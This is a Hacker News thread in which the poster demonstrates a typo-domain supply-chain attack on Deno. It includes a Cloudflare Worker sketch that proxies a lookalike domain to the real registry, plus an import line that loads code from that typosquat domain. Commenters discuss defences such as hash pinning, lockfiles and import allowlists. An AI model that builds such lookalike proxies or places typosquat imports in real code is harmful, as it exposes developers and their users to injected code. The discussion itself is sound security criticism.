[flagged] Show HN: Deon.land – Deno.land?
32 points by hobofan on Feb 25, 2023 | hide | past | favorite | 24 comments
After yesterday's release of Deno with package.json support[0], discussions about how Deno handles dependencies have been coming up again.

Since Deno's inception, I've mostly watched it from the sidelines, dabbling a bit with it and considering it a fad that will die out sooner or later.

Ultimately, with the new package.json support nothing really changed regarding the dependency management story of Deno. It's still as awful as ever.

Prompted by some of those discussions, I decided to test how easy it would be to mount a typo-domain supply chain attack. And as expected, it's about as easy as buying a domain and setting up a Cloudflare Worker (which isn't any harder than setting up Deno Deploy).
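
For illustration, here is a minimal sketch of what such a proxying Worker could look like (not necessarily the actual code behind deon.land; it assumes the Workers module syntax and that the typo domain is routed to the Worker):

```
// Sketch of a typo-domain proxy: every request to the typo domain is
// forwarded to the real deno.land, so the served modules are byte-identical
// until the operator decides to swap in a payload.
export default {
  async fetch(request: Request): Promise<Response> {
    const url = new URL(request.url);
    url.hostname = "deno.land"; // forward to the legitimate registry
    return fetch(new Request(url.toString(), request));
  },
};
```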

And voilà: to import your favorite dependency, just copy-paste the following snippet into your code (which, after all, is how you include dependencies in Deno):

```
import * as flat from "https://deon.land/x/flat@0.0.15/mod.ts";
```

Which is virtually indistinguishable from what you'll find here[1]:

```
import * as flat from "https://deno.land/x/flat@0.0.15/mod.ts";
```

(I swear, nothing bad will happen!)

-------

Typo supply-chain attacks aren't anything new. They have probably been the most popular attack type on package managers (and their registries) in the past few years. This one is slightly different, and even worse: unlike on a moderated[2] registry like npmjs.com, it can't easily be taken down to reduce developers' exposure to it.

While this is just a fun little gag, the Deno team's stance on security is not so funny.

While Deno has a few minimal security options nowadays, such as subresource integrity via a deno.json, you have to actively seek them out, and most projects don't even use a deno.json.

Deno is creating an ecosystem with bad security defaults (and a community rejecting efforts to improve them) in order to have a "simpler" system. They prioritize onboarding new developers over the security needs of the users of the services those developers will build. I don't think that's okay.

So, go ahead and have fun: Replace deno.land with deon.land in every import you want. Deno won't stop you! :)

[0]: https://deno.com/blog/v1.31

[1]: https://deno.land/x/flat@0.0.15/mod.ts

[2]: https://docs.npmjs.com/reporting-malware-in-an-npm-package




What do you expect deno to do? Should it have a "repository" of whitelisted domains? Should it do typo checking for you? What is considered "good security defaults" here?

Deno intentionally doesn't control where and how you import dependencies, as long as the code in the dependency is valid, and I think that's better than gatekeeping domains. Deno has permissions built in just for this - i.e., if a dependency goes rogue, there's some level of control.

Consider Node/Bun, on the other hand. If a dependency goes rogue, there's virtually nothing stopping it except system permissions. That's a lot worse than Deno.

I think Deno tries to solve the core issue with running untrusted code (like a browser does to some extent). Dependency control can only go so far. So no complaints here.

This also gives Deno flexibility to support package.json with the same exact security guarantees. Isn't that better?


> Should it have a "repository" of whitelisted domains?

Yes, actually.

Deno's security model allows you to whitelist file paths and network domains with --allow-read, --allow-write, and --allow-net. But this doesn't apply to static imports. I don't see why it needs to be this way.

There should at least be a flag or deno.json config option that would require you to explicitly approve every new import domain, which would prevent typo attacks and make long chains of transitive imports obvious. deno.land could be allowed by default.


One option would be to include some hash value in the URL to pin the code file, e.g.:

import ... from 'https://...##<...sha...>';

Then a typo would just result in a resolution error.


This could be implemented as an import assertion[1]:

import foo from 'http://example.com/foo' assert { sha256sum: '...' }

This feature would even be useful in the web platform in general. Would also be nice to see an assertion for importing plain text files (not just JSON files) and assertions for per-module Deno permissions.

[1]: https://github.com/tc39/proposal-import-assertions


I think for the web platform there is already Subresource Integrity [1], which follows the same idea. Unfortunately, it works at the level of script tags, so it can't be used inside a script. But maybe this could be a starting point for making a proposal.

[1] https://en.m.wikipedia.org/wiki/Subresource_Integrity


Wanted to chime in on this since we are big supporters/users of Deno and are building an OSS, enterprise-grade platform for self-hosted lambdas that runs Deno scripts, among others [1].

I think this is unfair because npm has its own set of issues. Most notably, if anyone were to sneak a non-obvious trojan horse into the dependency chain, it would take a few weeks to be detected and millions of servers would already be compromised. You can do this with Deno too, but the norm is to use pinned versions and a deps.ts; it takes a bit more than an innocent npm install to break things.
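
For readers unfamiliar with the convention: a deps.ts is simply a module that re-exports pinned dependencies so the rest of the codebase imports them from one place. A minimal sketch (the modules and versions are just illustrative):

```
// deps.ts - the single place where third-party dependencies are pinned.
export * as flat from "https://deno.land/x/flat@0.0.15/mod.ts";
export * as path from "https://deno.land/std@0.178.0/path/mod.ts";

// elsewhere in the project:
// import { flat } from "./deps.ts";
```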

The real security for scripts is in the sandboxing, the permission model, and providing self-contained scripts that you can read and analyze in one go. So far, Node doesn't offer that experience. Deno is the leader of innovation in that specific area. It was a bold move, and the fact that it is moving back toward Node compatibility has a lot more to do with network effects and first-mover advantage than with an inherently bad design.

Bun has likely made the correct move by focusing on performance and Node compatibility from a business/adoption standpoint (and we will add Bun to our supported environments as a consequence), but from a security perspective, Deno is still the cutting edge.

[1]: https://github.com/windmill-labs/windmill


It is also the norm to strictly pin dependency versions in the npm ecosystem, at the project level, via lockfiles. So simply doing an `npm install` in an existing project won't install the new trojan.

Yes, versions aren't usually pinned at the package level, so if you install a new dependency that introduces the trojan to the project, then yeah, you are compromised. Not sure if that happens to "millions of servers" in a few weeks though; it'd have to be a pretty popular package at least, and it would have to remain undetected while these millions of developers presumably test the new code that their new dependencies introduce.

Having versions tightly pinned at the package level isn't a free gift. It'll lead to lots of duplicated versions of practically the same package being installed and run when two higher-level dependencies have a transitive dependency on slightly different (but in practice compatible) versions of the same package.

Edit: I agree with the points about sandboxing and permission configuration, etc, though. That's hopefully also coming to Node at some point.


It seems to me that the norm in the Node world is to use the ^ specifier to accept anything that is non-breaking, and that `npm install` will not respect the package-lock.json; only `npm ci` does.


> and that `npm install` will not respect the package-lock.json

I'm not sure where you got that from. Maybe this was the case for the first npm version with package-lock.json, but at least for the current and previous LTS versions, it is definitely being respected.


This is correct up to a point (which is why npm ci exists at all). I agree that, since you would have to mutate the package.json for that to happen, my point is mostly moot (https://stackoverflow.com/questions/45022048/why-does-npm-in...), but npm install will overwrite the package-lock.json if they do not match.


> if anyone were to sneak a non-obvious trojan horse into the dependency chain, it would take a few weeks to be detected and millions of servers would already be compromised. You can do this with Deno too, but the norm is to use pinned versions and a deps.ts.

Only for consumers that blindly auto-update dependencies. The norm in the npm world has also finally arrived at having a lockfile, so you are using pinned versions as well. The lockfile also has the additional benefit of reducing the impact of updating an individual dependency, as the resolution mechanism doesn't have to start from scratch and only a small part of the dependency tree will be updated.

With Deno's exact version pinning, on the other hand, one is significantly more exposed to CVEs in transitive dependencies, as one has to rely on all dependencies to update their dependencies and coordinate the fixes throughout the ecosystem. In a system based around SemVer ranges and automated dependency resolution, one "only" has to bump the version of that transitive dependency. This could be remedied a bit in Deno by allowing URLs to be globally rewired (or by mirroring/forking the whole dependency chain), but as far as I can tell this mechanism/tooling doesn't exist in Deno (yet).

> I think this is unfair

> sandboxing, permissioning model

> Deno is the leader of innovation in that specific area.

I think the only point that was unfair was "the Deno team's stance on security is not so funny" (and I would strike it now if HN would still let me edit the post). You are right that their efforts on the sandboxing front are very commendable. However, the overall package (including their dependency management) doesn't feel thought through security-wise, and their URL-focused dependency story opens a lot of additional security holes.


Stop shifting responsibility for security off to centralized third parties. If you decide to type out a URL rather than copy it, and you mess up the URL, that's your fault and no one else's.

Hilarious, how we demonize NPM and now we're wondering why Deno doesn't handle dependencies like Node. Sometimes I hate the shit out of this field.


Wait until you learn what a webpage can link to and trick people into clicking!


They chose a decentralised package management system, whereas Node has a centralised one. A tradeoff, as you mentioned, is that you can't just take down malicious packages. I'm personally not too concerned with this because of the following:

1. The default permissions while running a script are stricter than Node's: you get told when your code tries to access your file system or network (see the sketch after this list)

2. Code I write for Deno typically uses fewer dependencies than the equivalent code for Node, simply because Deno has a good standard library with many web APIs
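
As a rough sketch of point 1 (assuming a hypothetical example.ts run without --allow-net; Deno will prompt for, or deny, the network access instead of letting it happen silently):

```
// example.ts - run with: deno run example.ts
try {
  const res = await fetch("https://deno.land/std/version.ts");
  console.log("fetched", res.status);
} catch (err) {
  if (err instanceof Deno.errors.PermissionDenied) {
    console.error("Network access was not granted; nothing was fetched.");
  } else {
    throw err;
  }
}
```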

> the Deno team's stance on security is not so funny

Can you give examples of this?


Node is working to add module based permissions: https://nodejs.org/api/permissions.html

This might help against the supply-chain attacks which Node is also prone to after adding support for URL imports (yes, you can import directly from a URL in Node too).


What would you propose changing for this specific issue? Would you still consider it broken if deno supports, e.g. `import * as flat from "https://mycustom.com/x/flat@0.0.15/mod.ts";`?


I've never typed the full HTTP link of a dependency by hand. Does anyone do that?


Accidental typos aren't the only way this could be used. You could open a PR that contributes a new feature - all the code looks good, and the feature works as expected, but included in the PR is a new malicious dependency that uses deon.land instead of deno.land. That's an easy thing to miss when reviewing a large PR.


NPM can specify GitHub URLs as dependencies, so I don't see how this is a problem exclusive to Deno and not Node.

Also, this problem can be mitigated by static analysis. No reason why a pre-push hook can't look at all the import identifiers and restrict them to a whitelist of domains.

But having mentioned this before in another recent thread about Deno, some people are under the impression that statically analyzing imports is really hard, even though a junior engineer could figure it out with an AST parser in a day.
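
A rough sketch of such a check, written here as a Deno script using the TypeScript compiler API via an npm: specifier (the allowlist, file name, and invocation are made up for illustration):

```
// check_imports.ts - hypothetical pre-push check: fail if any static import
// points at a host outside the allowlist.
// Usage: deno run --allow-read check_imports.ts <file.ts>
import ts from "npm:typescript";

const ALLOWED_HOSTS = new Set(["deno.land"]);

function disallowedImports(fileName: string, source: string): string[] {
  const sourceFile = ts.createSourceFile(fileName, source, ts.ScriptTarget.Latest, true);
  const offenders: string[] = [];
  const visit = (node: ts.Node): void => {
    if (ts.isImportDeclaration(node) && ts.isStringLiteral(node.moduleSpecifier)) {
      const spec = node.moduleSpecifier.text;
      if (
        (spec.startsWith("http://") || spec.startsWith("https://")) &&
        !ALLOWED_HOSTS.has(new URL(spec).hostname)
      ) {
        offenders.push(spec);
      }
    }
    ts.forEachChild(node, visit);
  };
  visit(sourceFile);
  return offenders;
}

const file = Deno.args[0];
const bad = disallowedImports(file, await Deno.readTextFile(file));
if (bad.length > 0) {
  console.error("Imports from non-allowlisted hosts:", bad);
  Deno.exit(1);
}
```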


The first time I saw fontawesome being imported in a PR, I had to double-check to make sure fortawesome wasn't a typo.

npm install @fortawesome/fontawesome-svg-core


Typo attacks aren't just about typing the error by hand. They are often more about fooling human visual perception.

E.g., for a larger-scale attack, you could replicate the whole deno.land/x/ website, which is where people often copy-paste the import snippet from. And as the sibling comment points out, typo-ed dependencies can also be introduced into existing codebases via a PR.


Nobody did. But where did you get that link from?

With nginx and LE it's quite trivial to have soemsite.tld serve valid content for somesite.tld, except for the payload.


We are moving to a regime where every app you run must be sandboxed and containerized (à la Flatpak). But that won't be enough. The next step is sandboxing and containerizing every library you depend on.


It would have been better if "sandboxing and containerizing every library you depend on" had been the first step instead of the second.



